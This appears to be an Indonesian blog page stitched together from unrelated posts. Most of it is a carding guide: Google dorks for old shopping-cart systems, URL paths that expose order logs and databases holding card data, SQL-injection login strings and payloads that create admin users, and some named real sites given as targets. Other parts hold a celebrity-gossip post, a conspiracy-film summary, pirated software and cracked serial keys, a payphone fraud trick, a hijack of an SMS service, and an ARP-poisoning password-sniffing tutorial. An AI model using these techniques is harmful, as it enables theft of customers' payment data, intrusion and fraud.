Contoh bugs pada bentuk toko system : shopadmin

Ketik keyword google : allinurl:/shopadmin.asp
Contoh target : www.Target.com/shopadmin.asp
user : ‘or’1
pass : ‘or’1

Contoh bugs pada bentuk toko sistem : Index CGI

Ketik keyword google : allinurl:/store/index.cgi/page=
Contoh target : http://www.Target.com/cgi-bin/store/…short_blue.htm
Hapus short_blue.htm dan ganti dengan :./admin/files/order.log
Hasilnya:http://www.Target.com/cgi-bin/store/…iles/order.log

Contoh bugs pada bentuk toko sistem : metacart

Ketik keyword google.com : allinurl:/metacart/
Contoh target : www.Target.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan : –> /database/metacart.mdb
Hasilnya : /www.Target.com/metacart/database/metacart.mdb

Contoh bugs pada bentuk toko sistem CShop

Ketik keyword google.com : allinurl:/DCShop/
Contoh : www.Target.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan
/DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.Target.com/xxxx/DCShop/orders/orders.txt

Contoh bugs pada bentuk toko sistem : EShop

Ketik keyword google.com : allinurl:/eshop/
Contoh : www.Target.com/xxxxx/eshop
Hapus /eshop dan ganti dengan : /cg-bin/eshop/database/order.mdb
Hasilnya : http://www.Target.com/…/cg-bin/esh…base/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

Contoh bugs pada bentuk toko sistem : PDshopro

Ketik keyword google.com : allinurl:/shop/category.asp/catid=
Contoh : www.Target.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxxx dang ganti dengan : /admin/dbsetup.asp
Hasilnya : www.Target.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.Target.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

Contoh bugs pada bentuk toko sistem : commerceSQL

Ketik keyword google.com : allinurl:/commercesql/
Contoh : www.Target.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan: cgi-bin/commercesql/index.cgi?page=
Hasilnya : http://www.Target.com/cgi-bin/commer…ndex.cgi?page=
Untuk melihat admin config
http://www.Target.com/cgi-bin/commer…/admin_conf.pl
Untuk melihat admin manager
http://www.Target.com/cgi-bin/commer…in/manager.cgi
Untuk melihat file log/CCnya
http://www.Target.com/cgi-bin/commer…iles/order.log

Contoh bugs pada bentuk toko sistem : Cart32 v3.5a

Ketik keyword google.com : allinurl:/cart32.exe/
Contoh : http://www.Target.net/wrburns_s/cgi-…xe/NoItemFound
Ganti NoItemFound dengan : error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file dgn format
/akhiran.c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www. Target.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.Target.com/cart32/
Contoh http://www.Target.net/wrburns_s/cgi-…RNS-001065.c32

Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

Ketik keyword google.com : allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp

Contoh :
http://Target.com/vpasp/shopdisplayp…39;a%25′–

Gantilah nilai dari string url terakhir dg:
: %20′a%25′–
: %20′b%25′–
: %20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://Target.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

Ketik keyword google.com : Ketik –> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :

Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6

Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6

Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6

Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :

Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://Target/vpasp/shopadmin.asp

Contoh bugs pada bentuk toko sistem : Lobby.asp

Ketik keyword google.com : allinurl: Lobby.asp
Contoh : www.Target.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan : fpdb/shop.mdb
Hasilnya : www.Target.com/fpdb/shop.mdb

Contoh bugs pada bentuk toko sistem : Shopper.cgi

Ketik keyword google.com : allinurl: /cgi-local/shopper.cgi
Contoh : http://www.Target.com/cgi-local/shop…dd=action&key=
Tambah dengan :…&template=order.log
Hasilnya :
http://www.xxxxxxxx.com/cgi-local/sh…late=order.log

Contoh bugs pada bentuk toko sistem roddetail.asp

Ketik keyword google.com : allinurlroddetail.asp?prod=
Contoh : http://www.Target.org/proddetail.asp…ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369
dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : www.Target.org/fpdb/vsproducts.mdb

Contoh bugs pada bentuk toko sistem igishop

Ketik keyword google.com : inurl:”/cart.php?m=”
Contoh : http://Target.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view
dan ganti dengan –>admin
Hasilnya http://Target.com/store/admin

Trus masukin username sama pass nya pake statment SQL injection

Usename : ‘or”=”
Password : ‘or”=”

setelah bisa login, cari data yang diperlukan .

Contoh bugs pada bentuk toko sistem : Index CGI

Ketik keyword google.com : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/…ir_Manuals.htm
masukin bugsnya : http://www.target.com/cgi-bin/store/…iles/order.log
trus copy-paste tuch log’nya di notepad biar gampang di baca

Contoh bugs pada bentuk toko sistem : Index Cart

Ketik keyword google.com : inurl:”/cart.php?m=”
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :’or”=”
Passwordnya :’or”=”
contoh target buat kalian :
https://www.therustybucket.biz/store/admin

Contoh bugs pada bentuk toko sistem : Index cart

Ketik keyword google.com : /ashopKart20/”
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example www.garrysun.com/ashopkart20/addprod.asp
Injection : selanjutnya masukin bugs di atas jadi : www.garrysun.com/ashopkart20/admin/scart.mdb
kalo berhasil loe dapet file beresktension .mdb nach file itu
tmn2 open with MS-Acces

Contoh bugs pada bentuk toko sistem : Catid

Ketik keyword google.com : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example : www.littlesport.net/shop/category.asp?catid=2
masukin bugs menjadi : www.littlesport.net//admin/dbsetup.asp
kalo berhasil dapet file.mdb trus buka pake MS – Access tapi kalo gagal berarti
dah keduluan ma carder yang lain… cari target lain ok..??

Contoh bugs pada bentuk toko sistem : Store

Ketik keyword google.com : inurl:”/store/proddetail.asp?prod=”
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
Example : http://www.successlink.org/store/pro…prod=SL-IP0001
masukin bugsnya www.successlink.org/store/fpdb/vsproducts.mdb
download file .mdbnya trus buka pake MS- ACCESS..

Contoh bugs pada bentuk toko sistem : Sunshop

Ketik keyword google.com : “Powered by SunShop 3.2″
Atau google dork : inurl:”/sunshop/index.php?action=”
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik “OK” aja
Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php
ganti dengan admin http ://www.dohertysgym.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :’or”=’

Contoh bugs pada bentuk toko sistem : digishop

Ketik keyword google.com
Ketik keyword google.com : “Powered by Digishop 3.2″
Bugs : hapus tulisan cart.php?m= dengan admin
Login pake SQL Injection :
Username : ‘or”=”
Password : ‘or”=”
Contoh target :
http://uniquescrapbooks.com.au/store/admin
http://www.7footserb.com/shop/admin
https://www.tangerineclothing.com/admin

Contoh bugs pada bentuk toko sistem :Lobby

Ketik keyword google.com : inurl:”mall/lobby.asp”
bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb
example : Gem Depot Lobby Page – Search our Inventory
jadi http://www.gemdepot.com/fpdb/shop.mdb
dapat dech .mdb ===> trus klik open database JANGAN klik “convert databese” ===> klk view orders ====> trus cari orang yg pernah belanja contoh pada customer no 36 trus dimana no CCnya badKiddes….
sabar bro… masih di table customer no 36 then klik payment

berdasarkan link artikel di situs kompas
http://megapolitan.kompas.com/read/xml/2009/02/18/09182731/Situs.Porno.Jual.Artis

dan situs hartonosejakdulu.com yang kini uda di blokir ama “Pemerintah” disebutin bahwa beberapa artis papan atas kita bisa di booking asalkan harganya cocok… berkisar antara 300 juta hingga 3 miliar keatas…. waw…. semudah itukah artis kita menjual tubuhnya… boleh juga ni lok q dah jadi orang kaya…. hehehe…… beberapa nama artis itu adalah :

Julia Perez atau Jupe, Ria Irawan, Julie Estelle, Asmirandah, Ardina Rasti, Sarah Azhari, Nabila Syakieb. Intan Nuraini, Masayu Anastasia, dan Angel Lelga yang kini berganti nama menjadi Angelique.

ceritanya gini… q iseng maen ke Waroenk.net seperti biasanya niatnya pengen cari episode supernatural ama heroes yang baru… eh ko masi ga ada… trus ketimbang usesless ama wasting my time.. so q iseng liat folder2 sharing di tiap komp.. trus secara ga sengaja q temuin satu folder berisi banyak film.. salah satunya zeitgeist… trus.. q buka… ko kayae bagus.. trus q pulang.. tak liat sekitar jam 4 kurang (sore) durasinya cukup lama hampir 2 jam…

di bagian awal film ini bercerita tentang asal-usul tuhan… yang di tuhankan manusia.. pada intinya adalah dewa matahari.. begitu juga “KONSTRUKSI” Yesus sebagai oleh vatikan terus berlandaskan politik oleh kerajaan romawi kuno… pada dasarnya menganalogikan yesus sebagai dewa matahari atau dewa matahari di analogikan sebagai yesus…

nabi musa dan kaum yahudi yang menyimpang dari ajarannya… kemudian perang-perang yang selalu ada sepanjang sejarah umat manusia mengatasnamakan agama…

dalam chapter 2 film ini menceritakan tentang perang yang dilakukan oleh bush dan “pihak republikan” yang disebutkan secara eksplisit.. entah film ini berpihak atau tidak tapi menjelaskan berbagai fakta mulai dari 9/11 dan buku putih tentang 9/11 yang kontroversial…

dalam chapter 3 dijelaskan tentang posisi rockefeller empire yang mendukung mulai perang dunia 1, 2 sampai perang irak dan rencananya bakal mendukung penuh perang melawan iran tar… tapi ga tau kapan… ternyata rockefeller memasok dana baik untuk musuh maupun kawan.. jadi intinya ia pengen selalu ada perang yang tak berkesudahan di dunia karena akan menguntungkan mereka… dibalik itu ada perusahaan “perang” yang menyokong, minyak, dsb.. subprime mortege sudah di perkirakan jauh hari bahkan sebelum perang irak pda intinya “republikan” dan rockefeller empire pengen membuat dunia jadi satu melalui 1 mata uang so keinginan deplu yang memprakarsai satu mata uang di ASEAN juga merupakan salah satu keberhasilan rockefeller emperium yang mempengaruhi pemikiran orang2 di dunia.. khususnya elit…

dalam chapter 4 dijelasin rencana rockefeller di tahun2 mendatang adalah membuat semua orang di dunia bisa di deteksi perilaku dan aktifitasnya melalui penanaman semacam “trackingdevice” di setiap anak… secara terselubung.. jika ada orang yang membelot maka dengan chip itu orang itu bisa di “non-aktifkan” ini semacam fasisme jilid modern…

Warnet di jember yang filemnya selalu terupdate tu :

1. Waroenk…  Jl. Jawa sebelahnya Maxima

2. Get Net.. Jl. SUmatra

3. FidhNet Jl. Jawa.. banyak filem korea.. hehe…

4. 80’s Jl. Mastrip

5. De Net Jl. Jawa tapi aku jarang kesana pernah ada konflik hehe…

6. Woody Jl. Jawa…

7. Einstein Jl. Mastrip

8. Trinity Jl. Jawa

9. Syskamplink Jl. Mastrip

10. Smile Jl. Kalimantan

11. Fastnet. Jl. Kalimantan -> Kalo ga salah masih dalam manajemen ( De Net Empire.. alias pemiliknya tu kakaknya yang punya De Net katanya)

12. Explore Jl. Mastrip.. q pernah suka ama opnya.. hehe.. cakep sii…

13. Asia Net… Jl. Jawa.. katanya si banyak tapi q jarang kesana

14. Irisnet Jl. Jawa.. lumayan lahh..

Warnet yang lain q lom njelajah lebih intense… bentar-bentar… diantara warnet yang q sebutin tu banyak Bokep loh.. buat Bokepers yang biasa nyetok filem buat pribadi ato disebarin.. yah cuman buat referensi aja.,.. gw taw cz temen2 q kadang tanya ke gw.. padahal gw cuman survei aja.. biasa namanya juga surveyor.. hahahaha… weits jangan salah ga ada niatan nyari bokep loh gw,,, jangan salah…

ydah semoga bermanfaat Bro…

Bagi semua pengunjung Blog gue… coba kalian masuk links kategori download…

disana kalian akan menemukan banyak software, lagu, majalah, walpaper, games, sampai OS pun ada… seperti windows 7, windows xp performance edition, directx 10 untuk xp, serta bikin windows 100% genuine dan masih banyak lagi.. semuanya Full version termasuk crack atau serialnya pun ada terlebih semuanya bebas virus… suerrrrr udah di test ama server sebelum di posting so terjamin bebas virus… trus masih ada lagi bagi penyuka XXX  juga ada lohh ter update setiap hari.. hehe… gue hanya mau share aje cuz aku dulu juga ngerasain susahnya nyari program bajakan di internet. yang gila tu.. softarchive.net masak di blokir di maxima padahal kan banyak software bagus disana… ga tau tu si hendrawan alias boznya maxima ko gitu… tapi jangan khawatir bisa diakali ko… masuk ke Google terus ktik alamat seperti softarchive.net terus kamu akan nemuin menu tembolok di sebelah kanan link alamat disana klik aja.. terus  TA… DAAAAA… semua kelihatan tanpa ada pemblokiran.. hehe… google emang MakNyoooozzz…. terus kalo mo mindah-mindah ya klik aja semua link disana ga kena blokir ko.. tapi kalo tiba2 kena ya apesnya kalian.. tapi q jamin ga kena koq… ok sekian selamat mencoba…

Ferrum
vistasoft
BFHTXJ-JHB14W-QYYRNN-BWA6JJ-XYQND7-0A4EQ9

Ferrum
vistasoft
BFF8V6-M9MC98-V2K17X-XHNMR8-CYJN00-QDPYNB

Setelah sekian lama bergerilya akhirnya q temukan serial avg 8.0 valid sampai 12 februari 2018

Lisensi/serialnya : 8MEH-REDSL-7ETEC-ULA8R-EAOKL-4EMBR-ACED

Selamat mencoba

Oleh Anthony Riley
Published: Februari 11, 2002
Print
Teknik-teknik yg digunakan dalam artikel ini hanya pernah dicoba di Malaysia. Jadi belum tentu berhasil di Indonesia. Bagi yang belum mengenal smartcard, Anril tidak akan berbicara banyak. Smartcard yang kita bicarakan di sini adalah kartu telepon dimana di bagian tengah atas ada sebuah chip kecil jika dilihat dari posisi hendak slot in.
|

Langkah2x :

1. Tentu saja cari target. Targetnya adalah telpon umum yg ganggangnya biru dan dwifungsi. Dwifungsi di sini maksudnya bisa pake koin dan smartcard.

2. Cari kartu (smartcard, dimana selanjutnya akan disebut kartu saja) yang kosong kemudian cari kawat halus yang kira2x diameternya 0.5-1 mm. Tempelkan ujung kawat yang satu pas di tengah chip kartu di mana ujung lainnya ditarik ke bawah sampai ke pinggir “jauh” kartu.

3. Mulailah telpon seperti biasanya, angkat ganggang telpon, masukkan koin, dsb akan tetapi ‘be alert’. Pada saat saluran telpon tersambung tetapi penjawab belum mengangkat, sisipkan kartu ‘Magic’ di atas segera dan tekan tombol hang up sekali kemudian nomor telpon Free Access. Untuk di Malaysia kami biasa menggunakan nomor 999.

4. Setelah nomor 999 ditekan dan yakin saluran tetap tersambung ke telpon “tujuan” (bukan ter-switch ke 999), tarik keluar kartunya. Bagaimana bisa tau hal tsb ? Perhatikan bunyi tone-nya, International Call dan Local Call beda.

5. Apakah benar2x Free ? Bagaimana dgn koinnya ? Jawabannya adalah benar. Koinnya akan keluar lagi setelah ganggang telpon ditaruh.

Anril sering melakukan international call (telpon balik ke Indo) dengan cara ini. Lain lagi dengan teman Anril yang kegatalan, suka call Party Line. Dasar tuh anak! Lama-kelamaan abis cerita juga.. Akses internasional semua telpon umum diblokir Telekom Malaysia, khususnya di daerah Anril belajar.

Sekedar info :

Anril suka segala macam tantangan yang berhubungan dengan komputer. Semua teknik-teknik dasarnya sudah pernah disentuh (HPVAC kecuali A-nya). Akan tetapi Anril lebih salut pada teman2x yang menguasai penuh satu bidang saja. Sebut saja si Phardera (Virii), Ganjaman (Cracking), dll. Greetz : Phardera, Ganjaman, Ding Lik, and Jasakom crew. Buat choka : elo bisa masuk server NT4 milik ISP C??????-PTK. Tapi itu bukan berarti elo bisa dapet account2xnya kan ?

From Jasakom.com

Oleh ftp_geo
Published: Agustus 6, 2003
Print
Ini ada cara membajak nomor HP Satelindo. Bisa Mentari & Matrix. Caranya? waduh mudah sekali.. ini cuman permainan Web Hacking plus sedikit psikologikal hacking.

LATAR BELAKANG
================
Satelindo sebagai operator mobile phone di Indonesia, rupanya nggak mau kalah sama adiknya M3 yang udah duluan menyediakan layanan SMS gratis via web. Layanan ini tersedia di alamat http://www.satelindogsm.com. Dengan mendaftarkan nomor Satelindo yang kita miliki, sudah bisa mengirimkan SMS via web.

Namun, ada satu kelemahan psikologikal pada layanan ini. Yaitu, tidak adanya konfirmasi ke nomor telepon pendaftar untuk mengaktifkan layanan ini. Sehingga semua orang yang mengetahui nomor Indosat Satelindo (walaupun milik orang lain) bisa mendapatkan layanan free SMS ini.

TRIKNYA
=========
Nah! Sekarang, silahkan buka www.satelindogsm.com dan daftarkan nomor SATELINDO siapa saja yang Anda kenal. Anda bisa melakukan hoax (menakut-nakuti) dengan mengirimkan SMS ke pemilik nomor tersebut. “Hehehe.. aku nyolong pulsamu..” Nah, dia akan menerima SMS dari nomor HPnya sendiri!!

Parahnya lagi, jika SMS via web ini digunakan untuk mengirimkan SMS ke operator lain, seperti Telkomsel, ProXL, apalagi keluar negeri!! Si pemilik nomor akan kehilangan pulsanya dengan cepat..

Penangkalannya: segera daftarkan nomor Satelindo Anda! Jangan samapai digunakan orang yang tidak bertanggung jawab!!

Bagi pihak Satelindo: jangan biarkan user memilih sendiri passwordnya via web ketika registrasi, lebih aman jika password dikirimkan ke HP. Lalu jika sang pengguna ingin mengganti passwordnya menjadi lebih manusiawi (bukannya hjf7673 gitu), sediakan saja fasilitas penggantian password sesudah dia login.

=============================================================================
TULISAN INI DIBUAT SEMATA-MATA HANYA UNTUK KEBUTUHAN PEMBELAJARAN
SEGALA EFEK YANG DITIMBULKAN AKIBAT TULISAN INI BUKAN TANGGUNG JAWAB PENULIS!
=============================================================================

(Trik ini saya dapat ketika me-registrasikan nomor Mentari istri saya yang tercinta, ketika dia dan HPnya ada di rumah..)

–EOF–

Catatan: Walaupun sudah di pacth, nggak ada salahnya diposting sekedar buat pembelajaran. Siapa tau ada yang mengulangi kesalahan ini.. Eh kebalik! Supaya kesalahan ini tidak terulang.. =p~~

ftp_geo
(The lates version of this writing can always be found at www.geocities.com/ftp_geo)

from jasakom.com

Tutorial ini saya bagi menjadi tiga bagian yaitu :

1. Part 1 (The Beginning) – Pengetahuan – pengetahuan dasar yang diperlukan

2. Part 2 (The Preparation) – Persiapan melakukan snffing

3. Part 3 (The End Of All) – The Sniffing Begins..!!!

Tutorial ini saya buat atas permintaan teman – teman di Hackers-center.org dan sebelumnya saya minta maaf kalau dalam penulisan tutorial ini terdapat banyak kesalahan. Mohon dimaklumi karena saya juga seorang newbee…

# PART 1 – THE BEGINNING

Dibagian ini saya ingin menjelaskan beberapa pengetahuan dasar yang diperlukan saat kita melakukan sniffing nanti. Sniffing terdiri dari dua macam yaitu passive atau active. Tapi yang akan kita bahas sekarang hanya untuk active sniffing pada switch.. Banyak yang yang bilang bahwa melakukan sniffing pada switch adalah suatu hal yang sulit tapi dalam tutorial ini akan saya tunjukkan itu bukan hal yang sulit.

++ SWITCH Merupakan suatu alat yang mempunyai fungsi dan bentuk yang sama dengan HUB tapi mempunyai cara kerja yang sangat berbeda. SWITCH mempunyai “kepintaran” tidak seperti HUB yang mengirimkan paket data yang tidak hanya diterima oleh komputer tujuan tapi juga oleh komputer lain. Hal ini memungkinkan komputer lain yang berada dalam jaringan tersebut membaca data yang dikirimkan dengan leluasa. Tapi SWITCH mempunyai fungsi yang memungkinkan data itu tidak akan dikirimkan kekomputer lain selain dari komputer tujuan. SWITCH juga mempunyai suatu memory yang biasanya disebut CAM (Content Addressable Memory) yang berfungsi untuk mencatat Mac Address agar saat pengiriman data tidak terjadi collison atau kerusakan paket data yang dikirimkan.

++ ARP (Address Resolution Protocol) ARP merupakan suatu protokol pengiriman paket data yang hanya berisi informasi tentang IP dan MAC Address (alamat fisik dari suatu kartu jaringan), dan paket ini dikirimkan secara broadcast.Paket ini terdiri dari dua yaitu ARP Reply Packet & ARP Request Packet, ARP ini digunakan SWITCH untuk mengetahui alamat fisik dari tiap komputer yang akan dikirimkan paket data. komputer dapat mencatat arp cache ini bila terjadi koneksi antara komputer dengan komputer lain ataupun dengan Switch. Koneksi yang terjadi bisa dengan berbagai cara tapi yang paling mudah adalah dengan perintah ping. Saya tidak akan membahas tentang hal teknis ini lebih jauh karena diinternet sudah banyak bertebaran apa dan bagaimana cara kerja dari SWITCH dan ARP.

# PART 2 – THE PREPARATION Dibagian ini saya akan membahas apa saja yang akan diperlukan untuk melakukan sniffing data.

Hal – hal yang diperlukan adalah :

1.Komputer yang terhubung ke dalam LAN(Pastinya harus ada),bisa dicoba diwarnet.

2.Aplikasi CAIN & ABEL (bisa di download di www.oxid.it)

Sebenarnya masih banyak tool lain yang dapat digunakan untuk melakukan sniffing data, tapi aplikasi Cain & Abel ini mempunyai satu keistimewaan yaitu dapat menangkap data – data khusus seperti Password dan fungsi – fungsi lain seperti untuk Recovery password.

Dibandingkan dengan sniffer lain seperti Ethereal (Sekarang berubah nama menjadi wireshark) yang akan menangkap semua data yang lalu lalang dijaringan Cain & Abel lebih mempersingkat kita dalam memilih data yang penting dan tidak. Sniffing untuk switch dapat kita lakukan dengan cara ARP Poisoning yaitu pengacauan / peracunan ARP cache antara switch dengan komputer yang ingin kita sadap. Yaitu kita membuat data yang dikirimkan dari komputer yang ingin disadap melalui komputer kita lebih dulu atau bisa disebut routing sebelum melalui switch atau gateway internet. Sehingga nanti kita dapat membaca data – data tersebut dengan leluasa (hal ini juga membuat koneksi komputer anda bertambah lambat).

Sebelumnya anda harus menginstal cain & abel ini seperti biasa menginstal aplikasi lain,yaitu tinggal klik next – next – next – next – finish. Kita juga harus menginstal driver winpcap yang digunakan untuk membaca data dijaringan caranya sama yaitu klik instal – next – next – i Agree – finish.

#PART 3 – THE SNIFFING BEGINS

Sekarang kita akan memulai sniffing data,dianggap cain & abelnya sudah terinstal. Pertama – tama klik 2x ikon cain didesktop,setelah keluar jendelanya kita harus mensetting terlebih dahulu.

Langkah – langkahnya :

1. Klik icon yang bergambar kartu jaringan,setelah keluar jendela configure kita harus memilih kartu jaringannya (jangan sampai salah) setelah itu klik OK.

2. Kemudian klik icon yang bergambar biohazard tepat disebelah kanan ikon kartu jaringan, hal ini untuk memulai arp poisoning.

3. Klik tab Sniffer yang berada diatas,setelah diklik dibawah nanti akan terlihat beberapa tab yaitu hosts, APR (ARP Poison Routing), Routing, Passwords, VoIP.

4. Klik tab hosts, seperti yang saya katakan kita harus mengetahui IP dan MAC Address dari komputer dan switch yang ingin kita sadap (hal ini dapat dengan mudah dilakukan tanpa harus menggunakan perintah ping, cukup dengan klik kanan dan pilih Scan Mac Addresses kemudian pilih All hosts in my subnet kemudian OK).

5. Kemudian ditabel Host tersebut akan tampil daftar IP dan MAC Address dari komputer dan switch yang terhubung dalam jaringan anda.

6. Klik tab APR,klik tabel yang paling atas sampai ikon yang bergambar tanda + (plus/positif) aktif. Kemudian klik ikon itu.

7. Kemudian akan keluar jendela baru dengan dua tabel. Tabel disebelah kiri dan tabel disebelah kanan adalah tabel untuk host yang ada didalam jaringan yang akan kita alihkan paket datanya. Pilih IP gateway/switch di tabel sebelah kiri dan IP komputer yang ingin disadap disebelah kanan (bisa juga sebaliknya terserah anda) klik OK.

8. Masih ditab APR nanti akan terlihat ditabel pertama dan kedua yaitu informasi tentang paket data yang dialihkan,yang diatas untuk LAN dan tabel yang dibawah untuk WAN.

9. Kemudian klik tab password nanti akan terlihat password yang lalu lalang dijaringan seperti password HTTP,FTP,ICQ,dll.

10. Selanjutnya terserah anda…^_^

REFERENCE

- Help CAIN & ABEL

- www.google.com

- www.ilmukomputer.com